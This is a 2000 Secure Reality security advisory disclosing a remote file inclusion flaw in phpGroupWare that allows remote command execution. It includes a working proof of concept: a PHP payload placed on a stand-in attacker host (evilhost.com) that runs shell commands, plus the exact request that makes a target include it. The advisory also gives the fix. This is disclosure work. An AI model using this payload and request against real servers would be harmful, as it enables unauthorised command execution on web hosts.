(SRADV00006) Remote command execution vulnerabilities in phpGroupWare

[Secure Reality Advisories <create () SECUREREALITY COM AU>]

=================================================
Secure Reality Pty Ltd. Security Advisory #6 (SRADV00006)
http://www.securereality.com.au
=================================================

[Title]
Remote command execution vulnerabilities in phpGroupWare

[Released]
6/11/2000

[Vulnerable]
Versions below 0.9.7 under Unix

[Overview]
phpGroupWare is a multi-user web based groupware suite written in PHP.
phpGroupWare is quite popular due to its integration of many aspects of
group cooperation: email, calendaring, file sharing, to do lists, etc.

phpGroupWare makes insecure calls to the include() function of PHP which can
allow the inclusion of remote files, and thereby the execution of arbitrary
commands on the remote web server with the permissions of the web server
user, usually 'nobody'

[Impact]
Remote command execution (with privileges as above)

[Detail]
This is an excellent example of another aspect of the remotely accessible
include files issue that has been discussed in detail recently. The
discussion has centered around the sensitive information that can be
contained in include files and the fact that include files generally have
the extension 'inc' and thus, if web accessible, are returned to the
requestor in plain text.

A common solution amongst freely available php scripts is to give include
files the extension .inc.php. This causes the include file to always be
processed by the PHP interpreter and therefore not return in plain text
sensitive configuration information, like database passwords. Thus these
programs can have easy installation (untar everything into the web space)
without worrying about configuration disclosure.

The problem however then becomes one of context. Code and configuration
variables in include files tend to be highly interdependent, that is,
certain files and data must have already been included before including a
particular file. By directly requesting the files we can break the
interdependence chain and cause data the include files could normally trust
to become untrustworthy.

Which leads us to the phpGroupWare vulnerability. We can directly request
the library include files that make up the phpGroupWare API, one of these
files, phpgw.inc.php performs an include based on variables that should have
been set as part of the call chain. By providing them ourselves we can
determine the initial part of the following include statement:

include($phpgw_info["server"]["include_root"] .
"/phpgwapi/phpgw_info.inc.php");

By providing $phpgw_info[server][include_root] as a form variable that
points to a remote web server on which we can place files, we can get the
script to retrieve /phpgwapi/phpgw_info.inc.php from that server and execute
it.

For example, if I had access to place files in a webspace
http://evilhost.com/~shaun/ I would create a directory "phpgwapi" and place
inside it a script called phpgw_info.inc.php with content like the
following:

<?php

        // PHP code to be executed
        $phpcode = '
                echo("Hi there!<BR>");
                passthru("id");
        ';

        // If we were called via remote include, send the code to be
        // executed
        if (substr($HTTP_SERVER_VARS["HTTP_USER_AGENT"], 0, 3) == "PHP")
                echo("<?php $phpcode ?>");
        else
        // Otherwise we're being executed on the target web server already,
        // so simply evaluate the code
                eval($phpcode);

        exit();

?>

(This script is designed so that the server it is placed on can be PHP
enabled and not result in the code being executed on the attacking machine)

If we then make a request to the target machine like the following:

/phpgroupware/inc/phpgwapi/phpgw.inc.php?phpgw_info[server][include_root]=ht
tp://evilhost.com/~shaun

The code should be retrieved and executed.

It should be noted there are some caveats to this attack:
- The remote web server must be able to retrieve the file, i.e no firewalls
in the way
- The remote web server must not be running PHP under Windows since remote
file includes are not supported on this platform
- The remote web server must be running a sufficiently recent version of PHP
that [][] form variables are allowed
- The remote web server must not have allow_url_fopen set off
- Later versions of phpGroupWare check the variable
$phpgw_info["server"]["header_version"] in phpgw.inc.php, for those versions
we need to provide that via form variables too

There may well be others based on other versions/configurations of PHP.

[Fix]
Please upgrade to the latest version of phpGroupWare (0.9.7) at
http://sourceforge.net/project/showfiles.php?group_id=7305

[Acknowledgements]
Our thanks to all of the developers of phpGroupWare, in particular Dan
Kuykendall, for their assistance in quickly correcting this issue.

[Disclaimer]
Advice, directions and instructions on security vulnerabilities in this
advisory do not constitute: an endorsement of illegal behavior; a guarantee
that protection measures will work; an endorsement of any product or
solution or recommendations on behalf of Secure Reality Pty Ltd. Content is
provided as is and Secure Reality Pty Ltd does not accept responsibility for
any damage or injury caused as a result of its use.